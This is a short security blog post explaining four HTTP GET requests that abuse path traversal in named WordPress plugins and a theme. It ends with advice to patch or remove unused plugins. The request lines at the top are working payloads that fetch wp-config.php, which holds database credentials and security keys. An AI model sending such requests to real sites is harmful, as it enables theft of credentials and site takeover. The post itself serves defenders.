GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php
These exploits take advantage of insecure wordpress plugins. Each of them have a query string parameter that would allow you to download a file. Theoretically the plugin was only supposed to allow you to download files from the current plugin directory, like music, audio, etc. that was allowed. But in this case the query string parameter wasn't properly properly the path passed in and it allowed for path traversal (../../) to go up and down the file system hierarchy. In this case the attacker is then attempting to get to the wp-config.php file which can contain your security keys , database user and password, etc. so some valuable data!
To prevent this, either patch your plugins when vulns like this come out ... or disable/remove unused plugins.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- DOM XSS 101 Walk-Through
- An Invoice email and a Hot mess of Java
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
